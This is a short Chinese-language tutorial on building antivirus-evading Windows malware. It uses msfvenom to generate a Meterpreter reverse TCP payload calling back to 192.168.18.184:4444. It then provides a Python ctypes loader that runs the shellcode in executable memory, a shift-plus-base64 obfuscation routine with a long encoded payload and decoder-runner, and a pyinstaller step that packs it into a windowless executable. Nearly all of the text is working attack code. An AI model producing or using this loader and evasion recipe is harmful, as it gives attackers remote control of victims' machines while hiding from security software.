简单的病毒绕过免杀,完成加壳操作
- kali构造payload
msfvenom –platform windows –a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.18.184 LPORT=4444 -f py -o shellcode2.py
- 放置python执行,注意这是64位系统
buf = b"\x4d\x5a\x41\x52\x55\......." import ctypes shellcode = buf shellcode = bytearray(shellcode) # 设置VirtualAlloc返回类型为ctypes.c_uint64 ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 #注释该句则为32位 # 申请内存 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) # 放入shellcode buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory( ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)) ) # 创建一个线程从shellcode放置位置首地址开始执行 handle = ctypes.windll.kernel32.CreateThread( ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)) ) # 等待上面创建的线程运行完 ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
- 连接成功
- 进行加密
import binascii,base64 resv = binascii.b2a_hex(buf) #将十六进制转换为字符 src = resv.decode() # print(res) def encode(src): re = '' for r in src: new = chr(ord(r)+5) #位移5位 re += new res = base64.b64encode(re.encode()).decode() #进行base64加密 print(res) encode(src)
- 进行解密并运行
import ctypes,binascii,base64 src = "a2g5PT04ajlrNWo9aGg1NTU1NTU5Njo2OTY6NTo3OT04Nmk3OjY7Ojk9PWc6Nzs1OT09Zzo3Nj06Ozk9PWc6Nzc1OWk4Nmg+OT09Zzw3OjU5PTVrZzw5ZjlmOT04Nmg1Zmg4aDs2PGg1NzdoNzU5Nmg2aD41aTk2NTZoNmo3amk6Nzk2OjY5PT1nOjc3NT1nOTc4aDk9NTZpNTs7PTY8PTY9NWc1NzVrPTo8NzU1NTU1NT1nPTU9PTU1NTU1NTk9PTpoNTw5Ozw5PTU2aTU9Zzk9Nj06NTk5PWc5NTc1OT41Nmk1ajg6Ozk9a2toPjlpODZoPjk2PWc4OT09OT01Nmk7OT04Nmg1OTZoNmg+NWlmaDk2NTZoNjg9ajU8Oms2OWg1ODloNzk1PTk6OD5pNjw6aT06PTk5PWc5NTc5OT41Nmk1Ozs5Nj1nNWg5PTk5PWc5NTZoOT41Nmk1OTY9ZzU5PT05Njo9OT01Nmk1OTY6PTpqOj46Zjk2Oj05Njo+OTY6Zjk9PThqaDc1OTY6N2trajU6PTk2Oj46Zjk9PWc2N2o+OWdra2tra2s6aTk+Z2o8PDw4ODc6azg4ODc1NTU1OTY6Ozk+PT5qOzk9PTZqaGY1NTY1NTU1OT49Pmo6OT5naDU3NTU2NjpoaDVmPTY3Zz05Njo5OT49Pmo5OWg9Pms2OTZnZjloPDw3OzU8a2tpOjloPT5qZjs9NTY1NjU1NTU6Pjk2Z2Y3Pj01O2c1NWtraTo7ZjVmOTY6ajo1OjU5aTg2aD45aTg2aDU5PWtraDU5PT0+aDc5PWtraDU5PT0+aDY5NmdmamY1a2lrajVra2k6OT09Pmg8O2Y2NTk2Oj05aD0+ajc5PT0+az45NmdmPj5mOjw5OzZra2k6PTpoNTw5NWY5PmtraGo8Omo6aj0+ODU1NTU1NTk9PThqaDY1OT09Pmo3OWk4Nmg+O2Y1OTk2Oj05PT0+az45NmdmNTdpPmg9Omtra2k6PThrPTU1PGo6Ojk9PThoOTc1Omo9Pms7O2Y5NTk2Oj47PTU1NjU1NTU1OTY6PTk9PT5rNzk9ODZoPjk2Z2Y6PWY5OjhqOmtraTo5PT0+aDg5Pj0+aDw5aTg2aD45Pj0+azU5PT0+aWY5PT0+az45NmdmNTdpPmg9Omtra2k6PThrPTU1PGk3PTo9OTY6PDo+Oz01NTk1NTU1NTk2Oj07ZjU1OmY5NmdmNWc3azVrODVra2k6Ojw6Pjk2Z2Y8OjtqOWk7NmtraTo5PmtraGpqPjhoa2tra2trOT01Nmg4OT03Pmg7OT09Oms7PDpnOTk2a2tqPDo9O2Y1NTo+OT5oPGg3azVnOmY3Ojtra2k6" def decode(src): res = base64.b64decode(src).decode() # print(res) sr = '' for s in res: new = chr(ord(s) - 5) sr += new # print(sr) buf = binascii.a2b_hex(sr) #将字符转换为十六进制 return buf buf = decode(src) # print(buf) shellcode = buf shellcode = bytearray(shellcode) # 设置VirtualAlloc返回类型为ctypes.c_uint64 ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 # 申请内存 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) # 放入shellcode buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory( ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)) ) # 创建一个线程从shellcode放置位置首地址开始执行 handle = ctypes.windll.kernel32.CreateThread( ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)) ) # 等待上面创建的线程运行完 ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
- 使用python命令打包
pyinstaller -F -w payload.py